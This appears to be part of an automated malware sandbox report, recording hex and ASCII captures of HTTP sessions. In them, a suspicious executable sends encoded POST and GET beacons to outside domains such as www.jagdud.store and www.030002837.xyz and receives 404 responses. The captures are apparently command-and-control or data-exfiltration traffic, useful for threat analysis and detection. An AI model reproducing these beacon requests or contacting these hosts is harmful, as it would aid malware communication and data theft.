                                                                                                                          Data Ascii: </head><body bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.givingaway123.net/1juc/?DJ=uNx48jdPyvmhqtM0&qFHlI=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D5s2z0t36TzSFH


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          29192.168.2.657341209.74.64.187802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:51.472347975 CEST748OUTPOST /qxse/ HTTP/1.1
                                                                                                                          Host: www.jagdud.store
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.jagdud.store
                                                                                                                          Referer: http://www.jagdud.store/qxse/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6d 72 46 4d 39 52 6d 53 55 78 2b 32 6e 4d 6f 50 53 42 4e 6e 4a 49 50 37 59 51 69 31 41 4a 38 55 34 4c 71 71 79 43 32 75 63 4e 66 59 53 6c 73 63 44 4a 64 73 72 73 63 61 4d 44 6b 6b 33 4c 46 42 69 39 66 7a 56 35 37 4e 73 53 2b 66 48 39 43 68 53 6c 74 54 65 76 47 45 6a 4d 57 76 4c 74 4f 39 38 57 64 57 68 69 66 33 75 77 78 48 75 47 6d 63 6e 51 52 7a 4b 4a 6a 6f 77 7a 53 43 30 69 76 31 30 79 36 56 71 4c 76 79 68 66 56 50 75 69 57 47 69 72 32 64 53 76 2f 31 35 4b 67 33 67 78 47 43 51 58 30 59 57 58 44 42 61 72 6b 78 73 72 41 7a 77 59 76 4e 6e 73 77 74 74 61 66 67 57 47 39 61 7a 77 4d 47 72 33 52 41 64 36 4d 43
                                                                                                                          Data Ascii: qFHlI=mrFM9RmSUx+2nMoPSBNnJIP7YQi1AJ8U4LqqyC2ucNfYSlscDJdsrscaMDkk3LFBi9fzV57NsS+fH9ChSltTevGEjMWvLtO98WdWhif3uwxHuGmcnQRzKJjowzSC0iv10y6VqLvyhfVPuiWGir2dSv/15Kg3gxGCQX0YWXDBarkxsrAzwYvNnswttafgWG9azwMGr3RAd6MC
                                                                                                                          Oct 21, 2024 17:26:52.019298077 CEST533INHTTP/1.1 404 Not Found
                                                                                                                          Date: Mon, 21 Oct 2024 15:26:51 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 389
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          30192.168.2.657342209.74.64.187802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:54.017167091 CEST772OUTPOST /qxse/ HTTP/1.1
                                                                                                                          Host: www.jagdud.store
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.jagdud.store
                                                                                                                          Referer: http://www.jagdud.store/qxse/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6d 72 46 4d 39 52 6d 53 55 78 2b 32 6d 73 59 50 65 43 6c 6e 63 34 4f 4a 47 67 69 31 4a 70 38 51 34 4c 32 71 79 41 61 2b 66 2f 37 59 56 41 6f 63 52 62 31 73 6d 4d 63 61 56 7a 6b 6c 39 72 46 61 69 39 43 4d 56 37 2f 4e 73 53 36 66 48 38 79 68 54 57 31 53 64 66 47 43 36 63 57 74 56 64 4f 39 38 57 64 57 68 69 61 53 75 78 5a 48 75 33 57 63 6f 52 52 38 55 5a 6a 72 36 54 53 43 35 43 76 35 30 79 36 4e 71 4f 48 59 68 64 39 50 75 6e 36 47 69 36 32 53 62 76 2f 2f 30 71 68 6a 72 6b 72 52 53 68 35 75 66 45 76 36 62 63 67 58 70 64 42 70 73 72 76 75 31 38 51 76 74 59 48 53 57 6d 39 77 78 77 30 47 35 67 64 6e 53 4f 70 68 75 6c 6f 69 79 48 66 77 54 30 5a 6d 4a 57 53 72 68 6c 44 2b 2f 77 3d 3d
                                                                                                                          Data Ascii: qFHlI=mrFM9RmSUx+2msYPeClnc4OJGgi1Jp8Q4L2qyAa+f/7YVAocRb1smMcaVzkl9rFai9CMV7/NsS6fH8yhTW1SdfGC6cWtVdO98WdWhiaSuxZHu3WcoRR8UZjr6TSC5Cv50y6NqOHYhd9Pun6Gi62Sbv//0qhjrkrRSh5ufEv6bcgXpdBpsrvu18QvtYHSWm9wxw0G5gdnSOphuloiyHfwT0ZmJWSrhlD+/w==
                                                                                                                          Oct 21, 2024 17:26:54.578855038 CEST533INHTTP/1.1 404 Not Found
                                                                                                                          Date: Mon, 21 Oct 2024 15:26:54 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 389
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          31192.168.2.657343209.74.64.187802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:56.571077108 CEST1785OUTPOST /qxse/ HTTP/1.1
                                                                                                                          Host: www.jagdud.store
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.jagdud.store
                                                                                                                          Referer: http://www.jagdud.store/qxse/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6d 72 46 4d 39 52 6d 53 55 78 2b 32 6d 73 59 50 65 43 6c 6e 63 34 4f 4a 47 67 69 31 4a 70 38 51 34 4c 32 71 79 41 61 2b 66 2f 7a 59 56 32 55 63 44 73 70 73 6e 4d 63 61 64 54 6b 6f 39 72 45 41 69 39 61 41 56 37 7a 43 73 52 53 66 48 61 75 68 62 48 31 53 4b 76 47 43 31 38 57 77 4c 74 4f 6b 38 57 4e 53 68 69 4b 53 75 78 5a 48 75 30 2b 63 68 67 52 38 54 70 6a 6f 77 7a 53 47 30 69 75 73 30 79 79 7a 71 4f 44 69 68 74 64 50 76 48 71 47 6a 49 65 53 55 76 2f 78 7a 71 68 72 72 6b 75 4a 53 6e 64 54 66 46 62 63 62 62 6f 58 6f 59 73 4a 34 70 69 7a 71 2f 73 59 37 61 36 30 56 57 39 35 6f 6a 49 48 2b 6d 4a 74 63 38 70 78 6a 77 6f 69 77 46 57 49 54 79 56 56 43 51 62 4b 6a 55 71 70 67 39 2b 58 77 53 74 44 49 46 71 70 42 73 64 34 36 38 2b 35 37 39 4d 61 78 41 4e 45 64 48 64 6a 57 36 49 6a 6e 45 2f 34 6e 6d 39 74 66 66 70 4f 77 49 58 70 47 33 53 70 44 54 62 50 64 58 78 65 64 6f 69 43 6a 6a 31 76 67 32 58 63 64 56 38 55 7a 2f 2f 44 4f 44 38 31 61 41 4f 45 38 70 46 53 6b 32 58 43 42 69 43 62 7a 55 2f 51 [TRUNCATED]
                                                                                                                          Data Ascii: qFHlI=mrFM9RmSUx+2msYPeClnc4OJGgi1Jp8Q4L2qyAa+f/zYV2UcDspsnMcadTko9rEAi9aAV7zCsRSfHauhbH1SKvGC18WwLtOk8WNShiKSuxZHu0+chgR8TpjowzSG0ius0yyzqODihtdPvHqGjIeSUv/xzqhrrkuJSndTfFbcbboXoYsJ4pizq/sY7a60VW95ojIH+mJtc8pxjwoiwFWITyVVCQbKjUqpg9+XwStDIFqpBsd468+579MaxANEdHdjW6IjnE/4nm9tffpOwIXpG3SpDTbPdXxedoiCjj1vg2XcdV8Uz//DOD81aAOE8pFSk2XCBiCbzU/QHOHmG36sqlDNXFD1DzANjcfmd3qPM/YIFZksFXIjG+6ZiEeazUwIz2L+NdUKXaYv9gv15WCkS/m11pdzmNIOfv10i9f8FGjhGyDBnIyZxUzGhISQOp0ik4AqxkQBWrUiYXhoQIVACSSm9DfpvlGjyLqmkTs6KH61Tr44XVmGFzACMyXp8IdAGRBmwS0A+syIDNA8QC10szkBoliHxf2Jb+n9MBpkem1aAiijsfF6eqk4jH0x5TszwHzLbAHQg6tPheB2WeFbtXyu65bG6Suc9s6mBnoWikPaqX/BzaFRJwJWpaa0045zfZ8QQPZ3pFL2MqCoLdq3QcsO+cy/kovWVY+6eAFZi4Zj0ghwCo6yQjN0Byx4frEmHvjrQZ5/GYQQ9j+WTq5FTdraB3iDmyy0C8LRl4n8QEgMULUhZeMKa8I+cvzgimb6WX/GL8vxN9fna4uQu4ufYyWP0K0iQOwgOo2wEMiCc+OeK5ocAhw8KejCOY5yZmImogdmTFh2EJxUIon4K3A723VBJUcpNQ1pyu3n+z4Cf3Nj8Oism3PDl89J6cyHh5FMcl4V8Td8SSVFhJUazQ7aqnfbICYBextmSjsn+cYP2GRvynzDh+eVAnUwequydj7+Mu66jb+qZgyHBIcgPhBAx+t9xLtLVz5dS6fW4lK+1eCyjY [TRUNCATED]
                                                                                                                          Oct 21, 2024 17:26:57.162192106 CEST533INHTTP/1.1 404 Not Found
                                                                                                                          Date: Mon, 21 Oct 2024 15:26:57 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 389
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          32192.168.2.657344209.74.64.187802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:59.111083031 CEST495OUTGET /qxse/?qFHlI=rpts+huSPQ+pmLEcaktqX4OYLAiBGOxJ0LqkryefQtnAbXwhGMtouJAJNGxD75BBoIrDH5z7ykmTX7GRRg85K9GP26O7G/CGnyNUhwPTmghA/Wmfri1zUJzRsgXk3AqKswS13LU=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.jagdud.store
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:26:59.678983927 CEST548INHTTP/1.1 404 Not Found
                                                                                                                          Date: Mon, 21 Oct 2024 15:26:59 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 389
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          33192.168.2.65734765.21.196.90802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:04.992007971 CEST751OUTPOST /y045/ HTTP/1.1
                                                                                                                          Host: www.030002837.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.030002837.xyz
                                                                                                                          Referer: http://www.030002837.xyz/y045/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 2f 33 70 69 34 56 64 6f 44 39 37 32 49 67 2b 59 66 70 50 4c 63 53 65 59 78 44 48 35 41 55 30 32 6d 76 38 44 4d 66 49 4b 6c 6b 59 67 37 34 70 75 44 47 48 58 52 58 45 43 53 76 72 4a 36 35 41 4e 42 73 47 58 32 6b 66 33 2f 48 2f 41 4a 4a 6b 63 64 31 52 4d 64 6b 32 30 6d 42 35 66 6b 45 6f 5a 44 2f 63 71 66 74 62 43 67 31 64 72 67 6a 47 36 77 4d 6c 7a 6e 68 39 6b 4f 79 50 79 38 61 71 5a 33 57 42 32 6a 50 2f 2f 6c 32 48 2f 64 58 38 6c 64 78 68 45 75 43 61 55 69 58 33 43 33 54 31 4d 33 5a 63 39 31 42 51 77 66 59 44 4e 34 75 31 42 2b 35 66 6e 6e 38 67 42 76 64 42 69 44 42 55 53 50 63 75 73 4f 64 58 72 4e 51 4a 63
                                                                                                                          Data Ascii: qFHlI=/3pi4VdoD972Ig+YfpPLcSeYxDH5AU02mv8DMfIKlkYg74puDGHXRXECSvrJ65ANBsGX2kf3/H/AJJkcd1RMdk20mB5fkEoZD/cqftbCg1drgjG6wMlznh9kOyPy8aqZ3WB2jP//l2H/dX8ldxhEuCaUiX3C3T1M3Zc91BQwfYDN4u1B+5fnn8gBvdBiDBUSPcusOdXrNQJc
                                                                                                                          Oct 21, 2024 17:27:05.599025965 CEST1032INHTTP/1.1 404 Not Found
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                          pragma: no-cache
                                                                                                                          content-type: text/html
                                                                                                                          content-length: 796
                                                                                                                          date: Mon, 21 Oct 2024 15:27:05 GMT
                                                                                                                          vary: User-Agent
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          34192.168.2.65734865.21.196.90802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:07.541938066 CEST775OUTPOST /y045/ HTTP/1.1
                                                                                                                          Host: www.030002837.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.030002837.xyz
                                                                                                                          Referer: http://www.030002837.xyz/y045/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 2f 33 70 69 34 56 64 6f 44 39 37 32 4b 42 75 59 61 4f 6a 4c 4e 69 65 58 30 44 48 35 58 45 30 79 6d 76 77 44 4d 65 39 56 6c 57 4d 67 37 5a 5a 75 43 43 54 58 43 6e 45 43 48 66 72 4d 30 5a 41 38 42 73 62 69 32 6d 62 33 2f 47 62 41 4a 4d 41 63 64 43 46 4e 62 30 32 4d 71 68 35 64 37 55 6f 5a 44 2f 63 71 66 70 37 6f 67 31 56 72 67 54 32 36 78 74 6c 30 6b 68 39 72 65 69 50 79 34 61 72 78 33 57 42 55 6a 4f 6a 42 6c 79 33 2f 64 57 4d 6c 64 41 68 4c 6b 43 62 66 6d 58 33 4d 34 53 63 4c 70 37 68 42 39 68 55 6a 4c 5a 58 76 30 34 30 62 69 4b 66 45 31 73 41 44 76 66 5a 51 44 68 55 34 4e 63 57 73 63 4b 62 4d 43 6b 73 2f 2b 54 64 41 41 61 55 4f 61 75 37 63 34 4d 58 61 66 44 43 47 76 41 3d 3d
                                                                                                                          Data Ascii: qFHlI=/3pi4VdoD972KBuYaOjLNieX0DH5XE0ymvwDMe9VlWMg7ZZuCCTXCnECHfrM0ZA8Bsbi2mb3/GbAJMAcdCFNb02Mqh5d7UoZD/cqfp7og1VrgT26xtl0kh9reiPy4arx3WBUjOjBly3/dWMldAhLkCbfmX3M4ScLp7hB9hUjLZXv040biKfE1sADvfZQDhU4NcWscKbMCks/+TdAAaUOau7c4MXafDCGvA==
                                                                                                                          Oct 21, 2024 17:27:08.139972925 CEST1032INHTTP/1.1 404 Not Found
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                          pragma: no-cache
                                                                                                                          content-type: text/html
                                                                                                                          content-length: 796
                                                                                                                          date: Mon, 21 Oct 2024 15:27:08 GMT
                                                                                                                          vary: User-Agent
